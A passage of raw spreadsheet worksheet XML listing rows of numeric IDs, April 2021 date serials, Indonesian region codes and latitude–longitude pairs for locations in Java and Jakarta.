      <c r="U3690" s="5">
        <v>11861492</v>
      </c>
      <c r="V3690" s="5" t="s">
        <v>17772</v>
      </c>
      <c r="W3690" s="5">
        <v>-850701</v>
      </c>
      <c r="X3690" t="s">
        <v>21507</v>
      </c>
      <c r="Y3690" t="str">
        <f t="shared" si="57"/>
        <v>-8.50701,118.61492</v>
      </c>
    </row>
    <row r="3691" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3691">
        <v>285663</v>
      </c>
      <c r="B3691" s="1">
        <v>44296</v>
      </c>
      <c r="C3691" s="2">
        <v>0.29481481481481481</v>
      </c>
      <c r="D3691" t="s">
        <v>22</v>
      </c>
      <c r="E3691" t="s">
        <v>23</v>
      </c>
      <c r="F3691" t="s">
        <v>12208</v>
      </c>
      <c r="H3691" t="s">
        <v>7086</v>
      </c>
      <c r="I3691" t="s">
        <v>11822</v>
      </c>
      <c r="J3691" t="s">
        <v>2615</v>
      </c>
      <c r="L3691" t="s">
        <v>12209</v>
      </c>
      <c r="M3691">
        <v>3402150001</v>
      </c>
      <c r="N3691">
        <v>3402150</v>
      </c>
      <c r="O3691">
        <v>3402</v>
      </c>
      <c r="P3691">
        <v>34</v>
      </c>
      <c r="Q3691" t="s">
        <v>7428</v>
      </c>
      <c r="R3691" t="s">
        <v>7429</v>
      </c>
      <c r="S3691" t="s">
        <v>7430</v>
      </c>
      <c r="T3691" t="s">
        <v>1856</v>
      </c>
      <c r="U3691" s="5">
        <v>11033511</v>
      </c>
      <c r="V3691" s="5" t="s">
        <v>17773</v>
      </c>
      <c r="W3691" s="5">
        <v>-784218</v>
      </c>
      <c r="X3691" t="s">
        <v>21508</v>
      </c>
      <c r="Y3691" t="str">
        <f t="shared" si="57"/>
        <v>-7.84218,110.33511</v>
      </c>
    </row>
    <row r="3692" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3692">
        <v>285664</v>
      </c>
      <c r="B3692" s="1">
        <v>44296</v>
      </c>
      <c r="C3692" s="2">
        <v>0.29590277777777779</v>
      </c>
      <c r="D3692" t="s">
        <v>22</v>
      </c>
      <c r="E3692" t="s">
        <v>23</v>
      </c>
      <c r="F3692" t="s">
        <v>12210</v>
      </c>
      <c r="G3692" t="s">
        <v>12211</v>
      </c>
      <c r="H3692" t="s">
        <v>7086</v>
      </c>
      <c r="I3692" t="s">
        <v>7414</v>
      </c>
      <c r="J3692" t="s">
        <v>2622</v>
      </c>
      <c r="L3692" t="s">
        <v>12212</v>
      </c>
      <c r="M3692">
        <v>3573050002</v>
      </c>
      <c r="N3692">
        <v>3573050</v>
      </c>
      <c r="O3692">
        <v>3573</v>
      </c>
      <c r="P3692">
        <v>35</v>
      </c>
      <c r="Q3692" t="s">
        <v>12213</v>
      </c>
      <c r="R3692" t="s">
        <v>9246</v>
      </c>
      <c r="S3692" t="s">
        <v>6321</v>
      </c>
      <c r="T3692" t="s">
        <v>1221</v>
      </c>
      <c r="U3692" s="5">
        <v>11260570</v>
      </c>
      <c r="V3692" s="5" t="s">
        <v>17774</v>
      </c>
      <c r="W3692" s="5">
        <v>-793660</v>
      </c>
      <c r="X3692" t="s">
        <v>21509</v>
      </c>
      <c r="Y3692" t="str">
        <f t="shared" si="57"/>
        <v>-7.93660,112.60570</v>
      </c>
    </row>
    <row r="3693" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3693">
        <v>285665</v>
      </c>
      <c r="B3693" s="1">
        <v>44296</v>
      </c>
      <c r="C3693" s="2">
        <v>0.29620370370370369</v>
      </c>
      <c r="D3693" t="s">
        <v>22</v>
      </c>
      <c r="E3693" t="s">
        <v>23</v>
      </c>
      <c r="F3693" t="s">
        <v>12214</v>
      </c>
      <c r="H3693" t="s">
        <v>7086</v>
      </c>
      <c r="I3693" t="s">
        <v>11822</v>
      </c>
      <c r="J3693" t="s">
        <v>2622</v>
      </c>
      <c r="L3693" t="s">
        <v>12215</v>
      </c>
      <c r="M3693">
        <v>3579010008</v>
      </c>
      <c r="N3693">
        <v>3579010</v>
      </c>
      <c r="O3693">
        <v>3579</v>
      </c>
      <c r="P3693">
        <v>35</v>
      </c>
      <c r="Q3693" t="s">
        <v>12216</v>
      </c>
      <c r="R3693" t="s">
        <v>9473</v>
      </c>
      <c r="S3693" t="s">
        <v>9473</v>
      </c>
      <c r="T3693" t="s">
        <v>1221</v>
      </c>
      <c r="U3693" s="5">
        <v>11252742</v>
      </c>
      <c r="V3693" s="5" t="s">
        <v>17775</v>
      </c>
      <c r="W3693" s="5">
        <v>-785076</v>
      </c>
      <c r="X3693" t="s">
        <v>21510</v>
      </c>
      <c r="Y3693" t="str">
        <f t="shared" si="57"/>
        <v>-7.85076,112.52742</v>
      </c>
    </row>
    <row r="3694" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3694">
        <v>285666</v>
      </c>
      <c r="B3694" s="1">
        <v>44296</v>
      </c>
      <c r="C3694" s="2">
        <v>0.29976851851851855</v>
      </c>
      <c r="D3694" t="s">
        <v>22</v>
      </c>
      <c r="E3694" t="s">
        <v>23</v>
      </c>
      <c r="F3694" t="s">
        <v>12217</v>
      </c>
      <c r="H3694" t="s">
        <v>7086</v>
      </c>
      <c r="I3694" t="s">
        <v>11822</v>
      </c>
      <c r="J3694" t="s">
        <v>2622</v>
      </c>
      <c r="L3694" t="s">
        <v>12218</v>
      </c>
      <c r="M3694">
        <v>3573030002</v>
      </c>
      <c r="N3694">
        <v>3573030</v>
      </c>
      <c r="O3694">
        <v>3573</v>
      </c>
      <c r="P3694">
        <v>35</v>
      </c>
      <c r="Q3694" t="s">
        <v>6231</v>
      </c>
      <c r="R3694" t="s">
        <v>12219</v>
      </c>
      <c r="S3694" t="s">
        <v>6321</v>
      </c>
      <c r="T3694" t="s">
        <v>1221</v>
      </c>
      <c r="U3694" s="5">
        <v>11263093</v>
      </c>
      <c r="V3694" s="5" t="s">
        <v>17776</v>
      </c>
      <c r="W3694" s="5">
        <v>-798901</v>
      </c>
      <c r="X3694" t="s">
        <v>21511</v>
      </c>
      <c r="Y3694" t="str">
        <f t="shared" si="57"/>
        <v>-7.98901,112.63093</v>
      </c>
    </row>
    <row r="3695" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3695">
        <v>285667</v>
      </c>
      <c r="B3695" s="1">
        <v>44296</v>
      </c>
      <c r="C3695" s="2">
        <v>0.30179398148148145</v>
      </c>
      <c r="D3695" t="s">
        <v>22</v>
      </c>
      <c r="E3695" t="s">
        <v>23</v>
      </c>
      <c r="F3695" t="s">
        <v>12220</v>
      </c>
      <c r="G3695" t="s">
        <v>12221</v>
      </c>
      <c r="H3695" t="s">
        <v>7086</v>
      </c>
      <c r="I3695" t="s">
        <v>12222</v>
      </c>
      <c r="J3695" t="s">
        <v>2622</v>
      </c>
      <c r="L3695" t="s">
        <v>12223</v>
      </c>
      <c r="M3695">
        <v>3507300009</v>
      </c>
      <c r="N3695">
        <v>3507300</v>
      </c>
      <c r="O3695">
        <v>3507</v>
      </c>
      <c r="P3695">
        <v>35</v>
      </c>
      <c r="Q3695" t="s">
        <v>12224</v>
      </c>
      <c r="R3695" t="s">
        <v>12225</v>
      </c>
      <c r="S3695" t="s">
        <v>6321</v>
      </c>
      <c r="T3695" t="s">
        <v>1221</v>
      </c>
      <c r="U3695" s="5">
        <v>11258176</v>
      </c>
      <c r="V3695" s="5" t="s">
        <v>17777</v>
      </c>
      <c r="W3695" s="5">
        <v>-791362</v>
      </c>
      <c r="X3695" t="s">
        <v>21512</v>
      </c>
      <c r="Y3695" t="str">
        <f t="shared" si="57"/>
        <v>-7.91362,112.58176</v>
      </c>
    </row>
    <row r="3696" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3696">
        <v>285668</v>
      </c>
      <c r="B3696" s="1">
        <v>44296</v>
      </c>
      <c r="C3696" s="2">
        <v>0.30725694444444446</v>
      </c>
      <c r="D3696" t="s">
        <v>22</v>
      </c>
      <c r="E3696" t="s">
        <v>23</v>
      </c>
      <c r="F3696" t="s">
        <v>12226</v>
      </c>
      <c r="H3696" t="s">
        <v>7086</v>
      </c>
      <c r="I3696" t="s">
        <v>7496</v>
      </c>
      <c r="J3696" t="s">
        <v>2622</v>
      </c>
      <c r="L3696" t="s">
        <v>12227</v>
      </c>
      <c r="M3696">
        <v>3518130002</v>
      </c>
      <c r="N3696">
        <v>3518130</v>
      </c>
      <c r="O3696">
        <v>3518</v>
      </c>
      <c r="P3696">
        <v>35</v>
      </c>
      <c r="Q3696" t="s">
        <v>12228</v>
      </c>
      <c r="R3696" t="s">
        <v>12229</v>
      </c>
      <c r="S3696" t="s">
        <v>10192</v>
      </c>
      <c r="T3696" t="s">
        <v>1221</v>
      </c>
      <c r="U3696" s="5">
        <v>11194648</v>
      </c>
      <c r="V3696" s="5" t="s">
        <v>17778</v>
      </c>
      <c r="W3696" s="5">
        <v>-761502</v>
      </c>
      <c r="X3696" t="s">
        <v>21513</v>
      </c>
      <c r="Y3696" t="str">
        <f t="shared" si="57"/>
        <v>-7.61502,111.94648</v>
      </c>
    </row>
    <row r="3697" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3697">
        <v>285669</v>
      </c>
      <c r="B3697" s="1">
        <v>44296</v>
      </c>
      <c r="C3697" s="2">
        <v>0.30807870370370372</v>
      </c>
      <c r="D3697" t="s">
        <v>22</v>
      </c>
      <c r="E3697" t="s">
        <v>23</v>
      </c>
      <c r="F3697" t="s">
        <v>12230</v>
      </c>
      <c r="H3697" t="s">
        <v>7086</v>
      </c>
      <c r="I3697" t="s">
        <v>7410</v>
      </c>
      <c r="J3697" t="s">
        <v>2622</v>
      </c>
      <c r="L3697" t="s">
        <v>12231</v>
      </c>
      <c r="M3697">
        <v>3518140010</v>
      </c>
      <c r="N3697">
        <v>3518140</v>
      </c>
      <c r="O3697">
        <v>3518</v>
      </c>
      <c r="P3697">
        <v>35</v>
      </c>
      <c r="Q3697" t="s">
        <v>12232</v>
      </c>
      <c r="R3697" t="s">
        <v>10192</v>
      </c>
      <c r="S3697" t="s">
        <v>10192</v>
      </c>
      <c r="T3697" t="s">
        <v>1221</v>
      </c>
      <c r="U3697" s="5">
        <v>11191161</v>
      </c>
      <c r="V3697" s="5" t="s">
        <v>17779</v>
      </c>
      <c r="W3697" s="5">
        <v>-759727</v>
      </c>
      <c r="X3697" t="s">
        <v>21514</v>
      </c>
      <c r="Y3697" t="str">
        <f t="shared" si="57"/>
        <v>-7.59727,111.91161</v>
      </c>
    </row>
    <row r="3698" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3698">
        <v>285670</v>
      </c>
      <c r="B3698" s="1">
        <v>44296</v>
      </c>
      <c r="C3698" s="2">
        <v>0.31489583333333332</v>
      </c>
      <c r="D3698" t="s">
        <v>22</v>
      </c>
      <c r="E3698" t="s">
        <v>23</v>
      </c>
      <c r="F3698" t="s">
        <v>12233</v>
      </c>
      <c r="G3698" t="s">
        <v>12234</v>
      </c>
      <c r="H3698" t="s">
        <v>7086</v>
      </c>
      <c r="I3698" t="s">
        <v>12235</v>
      </c>
      <c r="J3698" t="s">
        <v>2622</v>
      </c>
      <c r="L3698" t="s">
        <v>12236</v>
      </c>
      <c r="M3698">
        <v>3507070009</v>
      </c>
      <c r="N3698">
        <v>3507070</v>
      </c>
      <c r="O3698">
        <v>3507</v>
      </c>
      <c r="P3698">
        <v>35</v>
      </c>
      <c r="Q3698" t="s">
        <v>6319</v>
      </c>
      <c r="R3698" t="s">
        <v>6320</v>
      </c>
      <c r="S3698" t="s">
        <v>6321</v>
      </c>
      <c r="T3698" t="s">
        <v>1221</v>
      </c>
      <c r="U3698" s="5">
        <v>11272540</v>
      </c>
      <c r="V3698" s="5" t="s">
        <v>17780</v>
      </c>
      <c r="W3698" s="5">
        <v>-819565</v>
      </c>
      <c r="X3698" t="s">
        <v>21515</v>
      </c>
      <c r="Y3698" t="str">
        <f t="shared" si="57"/>
        <v>-8.19565,112.72540</v>
      </c>
    </row>
    <row r="3699" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3699">
        <v>285671</v>
      </c>
      <c r="B3699" s="1">
        <v>44296</v>
      </c>
      <c r="C3699" s="2">
        <v>0.32093749999999999</v>
      </c>
      <c r="D3699" t="s">
        <v>22</v>
      </c>
      <c r="E3699" t="s">
        <v>23</v>
      </c>
      <c r="F3699" t="s">
        <v>12237</v>
      </c>
      <c r="H3699" t="s">
        <v>7086</v>
      </c>
      <c r="I3699" t="s">
        <v>11822</v>
      </c>
      <c r="J3699" t="s">
        <v>2622</v>
      </c>
      <c r="L3699" t="s">
        <v>12238</v>
      </c>
      <c r="M3699">
        <v>3514090010</v>
      </c>
      <c r="N3699">
        <v>3514090</v>
      </c>
      <c r="O3699">
        <v>3514</v>
      </c>
      <c r="P3699">
        <v>35</v>
      </c>
      <c r="Q3699" t="s">
        <v>12239</v>
      </c>
      <c r="R3699" t="s">
        <v>12240</v>
      </c>
      <c r="S3699" t="s">
        <v>8284</v>
      </c>
      <c r="T3699" t="s">
        <v>1221</v>
      </c>
      <c r="U3699" s="5">
        <v>11271437</v>
      </c>
      <c r="V3699" s="5" t="s">
        <v>17781</v>
      </c>
      <c r="W3699" s="5">
        <v>-774855</v>
      </c>
      <c r="X3699" t="s">
        <v>21516</v>
      </c>
      <c r="Y3699" t="str">
        <f t="shared" si="57"/>
        <v>-7.74855,112.71437</v>
      </c>
    </row>
    <row r="3700" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3700">
        <v>285672</v>
      </c>
      <c r="B3700" s="1">
        <v>44296</v>
      </c>
      <c r="C3700" s="2">
        <v>0.32142361111111112</v>
      </c>
      <c r="D3700" t="s">
        <v>22</v>
      </c>
      <c r="E3700" t="s">
        <v>23</v>
      </c>
      <c r="F3700" t="s">
        <v>12241</v>
      </c>
      <c r="H3700" t="s">
        <v>7086</v>
      </c>
      <c r="I3700" t="s">
        <v>7733</v>
      </c>
      <c r="J3700" t="s">
        <v>2622</v>
      </c>
      <c r="L3700" t="s">
        <v>12242</v>
      </c>
      <c r="M3700">
        <v>3514090010</v>
      </c>
      <c r="N3700">
        <v>3514090</v>
      </c>
      <c r="O3700">
        <v>3514</v>
      </c>
      <c r="P3700">
        <v>35</v>
      </c>
      <c r="Q3700" t="s">
        <v>12239</v>
      </c>
      <c r="R3700" t="s">
        <v>12240</v>
      </c>
      <c r="S3700" t="s">
        <v>8284</v>
      </c>
      <c r="T3700" t="s">
        <v>1221</v>
      </c>
      <c r="U3700" s="5">
        <v>11271425</v>
      </c>
      <c r="V3700" s="5" t="s">
        <v>17782</v>
      </c>
      <c r="W3700" s="5">
        <v>-774846</v>
      </c>
      <c r="X3700" t="s">
        <v>21517</v>
      </c>
      <c r="Y3700" t="str">
        <f t="shared" si="57"/>
        <v>-7.74846,112.71425</v>
      </c>
    </row>
    <row r="3701" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3701">
        <v>285673</v>
      </c>
      <c r="B3701" s="1">
        <v>44296</v>
      </c>
      <c r="C3701" s="2">
        <v>0.32219907407407405</v>
      </c>
      <c r="D3701" t="s">
        <v>22</v>
      </c>
      <c r="E3701" t="s">
        <v>23</v>
      </c>
      <c r="F3701" t="s">
        <v>12243</v>
      </c>
      <c r="G3701" t="s">
        <v>12244</v>
      </c>
      <c r="H3701" t="s">
        <v>7086</v>
      </c>
      <c r="I3701" t="s">
        <v>12245</v>
      </c>
      <c r="J3701" t="s">
        <v>2622</v>
      </c>
      <c r="L3701" t="s">
        <v>12246</v>
      </c>
      <c r="M3701">
        <v>3573050003</v>
      </c>
      <c r="N3701">
        <v>3573050</v>
      </c>
      <c r="O3701">
        <v>3573</v>
      </c>
      <c r="P3701">
        <v>35</v>
      </c>
      <c r="Q3701" t="s">
        <v>1801</v>
      </c>
      <c r="R3701" t="s">
        <v>9246</v>
      </c>
      <c r="S3701" t="s">
        <v>6321</v>
      </c>
      <c r="T3701" t="s">
        <v>1221</v>
      </c>
      <c r="U3701" s="5">
        <v>11261068</v>
      </c>
      <c r="V3701" s="5" t="s">
        <v>17783</v>
      </c>
      <c r="W3701" s="5">
        <v>-795807</v>
      </c>
      <c r="X3701" t="s">
        <v>21518</v>
      </c>
      <c r="Y3701" t="str">
        <f t="shared" si="57"/>
        <v>-7.95807,112.61068</v>
      </c>
    </row>
    <row r="3702" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3702">
        <v>285674</v>
      </c>
      <c r="B3702" s="1">
        <v>44296</v>
      </c>
      <c r="C3702" s="2">
        <v>0.34472222222222221</v>
      </c>
      <c r="D3702" t="s">
        <v>22</v>
      </c>
      <c r="E3702" t="s">
        <v>23</v>
      </c>
      <c r="F3702" t="s">
        <v>12247</v>
      </c>
      <c r="G3702" t="s">
        <v>12248</v>
      </c>
      <c r="H3702" t="s">
        <v>7086</v>
      </c>
      <c r="I3702" t="s">
        <v>7733</v>
      </c>
      <c r="J3702" t="s">
        <v>2622</v>
      </c>
      <c r="L3702" t="s">
        <v>12249</v>
      </c>
      <c r="M3702">
        <v>3504020012</v>
      </c>
      <c r="N3702">
        <v>3504020</v>
      </c>
      <c r="O3702">
        <v>3504</v>
      </c>
      <c r="P3702">
        <v>35</v>
      </c>
      <c r="Q3702" t="s">
        <v>12250</v>
      </c>
      <c r="R3702" t="s">
        <v>1464</v>
      </c>
      <c r="S3702" t="s">
        <v>10249</v>
      </c>
      <c r="T3702" t="s">
        <v>1221</v>
      </c>
      <c r="U3702" s="5">
        <v>11177548</v>
      </c>
      <c r="V3702" s="5" t="s">
        <v>17784</v>
      </c>
      <c r="W3702" s="5">
        <v>-815101</v>
      </c>
      <c r="X3702" t="s">
        <v>21519</v>
      </c>
      <c r="Y3702" t="str">
        <f t="shared" si="57"/>
        <v>-8.15101,111.77548</v>
      </c>
    </row>
    <row r="3703" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3703">
        <v>285675</v>
      </c>
      <c r="B3703" s="1">
        <v>44296</v>
      </c>
      <c r="C3703" s="2">
        <v>0.44893518518518521</v>
      </c>
      <c r="D3703" t="s">
        <v>22</v>
      </c>
      <c r="E3703" t="s">
        <v>23</v>
      </c>
      <c r="F3703" t="s">
        <v>12251</v>
      </c>
      <c r="G3703" t="s">
        <v>12252</v>
      </c>
      <c r="H3703" t="s">
        <v>7086</v>
      </c>
      <c r="I3703" t="s">
        <v>7499</v>
      </c>
      <c r="J3703" t="s">
        <v>1128</v>
      </c>
      <c r="L3703" t="s">
        <v>12253</v>
      </c>
      <c r="U3703" s="5">
        <v>10740234</v>
      </c>
      <c r="V3703" s="5" t="s">
        <v>17785</v>
      </c>
      <c r="W3703" s="5">
        <v>-408345</v>
      </c>
      <c r="X3703" t="s">
        <v>21520</v>
      </c>
      <c r="Y3703" t="str">
        <f t="shared" si="57"/>
        <v>-4.08345,107.40234</v>
      </c>
    </row>
    <row r="3704" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3704">
        <v>285676</v>
      </c>
      <c r="B3704" s="1">
        <v>44296</v>
      </c>
      <c r="C3704" s="2">
        <v>0.46967592592592594</v>
      </c>
      <c r="D3704" t="s">
        <v>22</v>
      </c>
      <c r="E3704" t="s">
        <v>23</v>
      </c>
      <c r="F3704" t="s">
        <v>12254</v>
      </c>
      <c r="G3704" t="s">
        <v>12255</v>
      </c>
      <c r="H3704" t="s">
        <v>7086</v>
      </c>
      <c r="I3704" t="s">
        <v>7087</v>
      </c>
      <c r="J3704" t="s">
        <v>2622</v>
      </c>
      <c r="L3704" t="s">
        <v>12256</v>
      </c>
      <c r="M3704">
        <v>3504020016</v>
      </c>
      <c r="N3704">
        <v>3504020</v>
      </c>
      <c r="O3704">
        <v>3504</v>
      </c>
      <c r="P3704">
        <v>35</v>
      </c>
      <c r="Q3704" t="s">
        <v>12257</v>
      </c>
      <c r="R3704" t="s">
        <v>1464</v>
      </c>
      <c r="S3704" t="s">
        <v>10249</v>
      </c>
      <c r="T3704" t="s">
        <v>1221</v>
      </c>
      <c r="U3704" s="5">
        <v>11179087</v>
      </c>
      <c r="V3704" s="5" t="s">
        <v>17786</v>
      </c>
      <c r="W3704" s="5">
        <v>-813870</v>
      </c>
      <c r="X3704" t="s">
        <v>21521</v>
      </c>
      <c r="Y3704" t="str">
        <f t="shared" si="57"/>
        <v>-8.13870,111.79087</v>
      </c>
    </row>
    <row r="3705" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3705">
        <v>285678</v>
      </c>
      <c r="B3705" s="1">
        <v>44297</v>
      </c>
      <c r="C3705" s="2">
        <v>0.28680555555555554</v>
      </c>
      <c r="D3705" t="s">
        <v>2648</v>
      </c>
      <c r="E3705" t="s">
        <v>23</v>
      </c>
      <c r="G3705" t="s">
        <v>12258</v>
      </c>
      <c r="H3705" t="s">
        <v>26</v>
      </c>
      <c r="J3705" t="s">
        <v>12259</v>
      </c>
      <c r="L3705" t="s">
        <v>12260</v>
      </c>
      <c r="M3705">
        <v>3175060005</v>
      </c>
      <c r="N3705">
        <v>3175060</v>
      </c>
      <c r="O3705">
        <v>3175</v>
      </c>
      <c r="P3705">
        <v>31</v>
      </c>
      <c r="Q3705" t="s">
        <v>5964</v>
      </c>
      <c r="R3705" t="s">
        <v>2279</v>
      </c>
      <c r="S3705" t="s">
        <v>547</v>
      </c>
      <c r="T3705" t="s">
        <v>33</v>
      </c>
      <c r="U3705" s="5">
        <v>10693478</v>
      </c>
      <c r="V3705" s="5" t="s">
        <v>15080</v>
      </c>
      <c r="W3705" s="5">
        <v>-611741</v>
      </c>
      <c r="X3705" t="s">
        <v>21522</v>
      </c>
      <c r="Y3705" t="str">
        <f t="shared" si="57"/>
        <v>-6.11741,106.93478</v>
      </c>
    </row>
    <row r="3706" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3706">
        <v>285681</v>
      </c>
      <c r="B3706" s="1">
        <v>44298</v>
      </c>
      <c r="C3706" s="2">
        <v>0.49722222222222223</v>
      </c>
      <c r="D3706" t="s">
        <v>2648</v>
      </c>
      <c r="E3706" t="s">
        <v>23</v>
      </c>
      <c r="G3706" t="s">
        <v>12261</v>
      </c>
      <c r="H3706" t="s">
        <v>26</v>
      </c>
      <c r="J3706" t="s">
        <v>2384</v>
      </c>
      <c r="L3706" t="s">
        <v>12262</v>
      </c>
      <c r="M3706">
        <v>3172090006</v>
      </c>
      <c r="N3706">
        <v>3172090</v>
      </c>
      <c r="O3706">
        <v>3172</v>
      </c>
      <c r="P3706">
        <v>31</v>
      </c>
      <c r="Q3706" t="s">
        <v>2283</v>
      </c>
      <c r="R3706" t="s">
        <v>890</v>
      </c>
      <c r="S3706" t="s">
        <v>49</v>
      </c>
      <c r="T3706" t="s">
        <v>33</v>
      </c>
      <c r="U3706" s="5">
        <v>10688309</v>
      </c>
      <c r="V3706" s="5" t="s">
        <v>17787</v>
      </c>
      <c r="W3706" s="5">
        <v>-618091</v>
      </c>
      <c r="X3706" t="s">
        <v>21523</v>
      </c>
      <c r="Y3706" t="str">
        <f t="shared" si="57"/>
        <v>-6.18091,106.88309</v>
      </c>
    </row>
    <row r="3707" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3707">
        <v>285699</v>
      </c>
      <c r="B3707" s="1">
        <v>44298</v>
      </c>
      <c r="C3707" s="2">
        <v>0.55833333333333335</v>
      </c>
      <c r="D3707" t="s">
        <v>2648</v>
      </c>
      <c r="E3707" t="s">
        <v>23</v>
      </c>
      <c r="G3707" t="s">
        <v>12263</v>
      </c>
      <c r="H3707" t="s">
        <v>26</v>
      </c>
      <c r="J3707" t="s">
        <v>2580</v>
      </c>
      <c r="L3707" t="s">
        <v>12264</v>
      </c>
      <c r="M3707">
        <v>3172040005</v>
      </c>
      <c r="N3707">
        <v>3172040</v>
      </c>
      <c r="O3707">
        <v>3172</v>
      </c>
      <c r="P3707">
        <v>31</v>
      </c>
      <c r="Q3707" t="s">
        <v>1351</v>
      </c>
      <c r="R3707" t="s">
        <v>281</v>
      </c>
      <c r="S3707" t="s">
        <v>49</v>
      </c>
      <c r="T3707" t="s">
        <v>33</v>
      </c>
      <c r="U3707" s="5">
        <v>10689378</v>
      </c>
      <c r="V3707" s="5" t="s">
        <v>16273</v>
      </c>
      <c r="W3707" s="5">
        <v>-624113</v>
      </c>
      <c r="X3707" t="s">
        <v>21002</v>
      </c>
      <c r="Y3707" t="str">
        <f t="shared" si="57"/>
        <v>-6.24113,106.89378</v>
      </c>
    </row>
    <row r="3708" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3708">
        <v>286136</v>
      </c>
      <c r="B3708" s="1">
        <v>44300</v>
      </c>
      <c r="C3708" s="2">
        <v>0.20062499999999997</v>
      </c>
      <c r="D3708" t="s">
        <v>22</v>
      </c>
      <c r="E3708" t="s">
        <v>23</v>
      </c>
      <c r="F3708" t="s">
        <v>12265</v>
      </c>
      <c r="G3708" t="s">
        <v>12266</v>
      </c>
      <c r="H3708" t="s">
        <v>26</v>
      </c>
      <c r="I3708" t="s">
        <v>1055</v>
      </c>
      <c r="J3708" t="s">
        <v>2608</v>
      </c>
      <c r="L3708" t="s">
        <v>12267</v>
      </c>
      <c r="M3708">
        <v>3375040010</v>
      </c>
      <c r="N3708">
        <v>3375040</v>
      </c>
      <c r="O3708">
        <v>3375</v>
      </c>
      <c r="P3708">
        <v>33</v>
      </c>
      <c r="Q3708" t="s">
        <v>10355</v>
      </c>
      <c r="R3708" t="s">
        <v>7339</v>
      </c>
      <c r="S3708" t="s">
        <v>6246</v>
      </c>
      <c r="T3708" t="s">
        <v>1134</v>
      </c>
      <c r="U3708" s="5">
        <v>10968733</v>
      </c>
      <c r="V3708" s="5" t="s">
        <v>17788</v>
      </c>
      <c r="W3708" s="5">
        <v>-685916</v>
      </c>
      <c r="X3708" t="s">
        <v>21524</v>
      </c>
      <c r="Y3708" t="str">
        <f t="shared" si="57"/>
        <v>-6.85916,109.68733</v>
      </c>
    </row>
    <row r="3709" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3709">
        <v>286139</v>
      </c>
      <c r="B3709" s="1">
        <v>44300</v>
      </c>
      <c r="C3709" s="2">
        <v>0.36041666666666666</v>
      </c>
      <c r="D3709" t="s">
        <v>2648</v>
      </c>
      <c r="E3709" t="s">
        <v>23</v>
      </c>
      <c r="G3709" t="s">
        <v>12268</v>
      </c>
      <c r="H3709" t="s">
        <v>26</v>
      </c>
      <c r="J3709" t="s">
        <v>8086</v>
      </c>
      <c r="L3709" t="s">
        <v>12269</v>
      </c>
      <c r="M3709">
        <v>3171050005</v>
      </c>
      <c r="N3709">
        <v>3171050</v>
      </c>
      <c r="O3709">
        <v>3171</v>
      </c>
      <c r="P3709">
        <v>31</v>
      </c>
      <c r="Q3709" t="s">
        <v>8057</v>
      </c>
      <c r="R3709" t="s">
        <v>508</v>
      </c>
      <c r="S3709" t="s">
        <v>108</v>
      </c>
      <c r="T3709" t="s">
        <v>33</v>
      </c>
      <c r="U3709" s="5">
        <v>10677415</v>
      </c>
      <c r="V3709" s="5" t="s">
        <v>17789</v>
      </c>
      <c r="W3709" s="5">
        <v>-622885</v>
      </c>
      <c r="X3709" t="s">
        <v>21525</v>
      </c>
      <c r="Y3709" t="str">
        <f t="shared" si="57"/>
        <v>-6.22885,106.77415</v>
      </c>
    </row>
    <row r="3710" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3710">
        <v>286153</v>
      </c>
      <c r="B3710" s="1">
        <v>44300</v>
      </c>
      <c r="C3710" s="2">
        <v>0.3666666666666667</v>
      </c>
      <c r="D3710" t="s">
        <v>2648</v>
      </c>
      <c r="E3710" t="s">
        <v>23</v>
      </c>
      <c r="G3710" t="s">
        <v>12270</v>
      </c>
      <c r="H3710" t="s">
        <v>26</v>
      </c>
      <c r="J3710" t="s">
        <v>8233</v>
      </c>
      <c r="L3710" t="s">
        <v>12271</v>
      </c>
      <c r="M3710">
        <v>3172020005</v>
      </c>
      <c r="N3710">
        <v>3172020</v>
      </c>
      <c r="O3710">
        <v>3172</v>
      </c>
      <c r="P3710">
        <v>31</v>
      </c>
      <c r="Q3710" t="s">
        <v>3744</v>
      </c>
      <c r="R3710" t="s">
        <v>1644</v>
      </c>
      <c r="S3710" t="s">
        <v>49</v>
      </c>
      <c r="T3710" t="s">
        <v>33</v>
      </c>
      <c r="U3710" s="5">
        <v>10687454</v>
      </c>
      <c r="V3710" s="5" t="s">
        <v>17790</v>
      </c>
      <c r="W3710" s="5">
        <v>-630214</v>
      </c>
      <c r="X3710" t="s">
        <v>20980</v>
      </c>
      <c r="Y3710" t="str">
        <f t="shared" si="57"/>
        <v>-6.30214,106.87454</v>
      </c>
    </row>
    <row r="3711" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3711">
        <v>286217</v>
      </c>
      <c r="B3711" s="1">
        <v>44300</v>
      </c>
      <c r="C3711" s="2">
        <v>0.51527777777777783</v>
      </c>
      <c r="D3711" t="s">
        <v>2648</v>
      </c>
      <c r="E3711" t="s">
        <v>23</v>
      </c>
      <c r="G3711" t="s">
        <v>12272</v>
      </c>
      <c r="H3711" t="s">
        <v>26</v>
      </c>
      <c r="J3711" t="s">
        <v>2580</v>
      </c>
      <c r="L3711" t="s">
        <v>12273</v>
      </c>
      <c r="M3711">
        <v>3172040005</v>
      </c>
      <c r="N3711">
        <v>3172040</v>
      </c>
      <c r="O3711">
        <v>3172</v>
      </c>
      <c r="P3711">
        <v>31</v>
      </c>
      <c r="Q3711" t="s">
        <v>1351</v>
      </c>
      <c r="R3711" t="s">
        <v>281</v>
      </c>
      <c r="S3711" t="s">
        <v>49</v>
      </c>
      <c r="T3711" t="s">
        <v>33</v>
      </c>
      <c r="U3711" s="5">
        <v>10689378</v>
      </c>
      <c r="V3711" s="5" t="s">
        <v>16273</v>
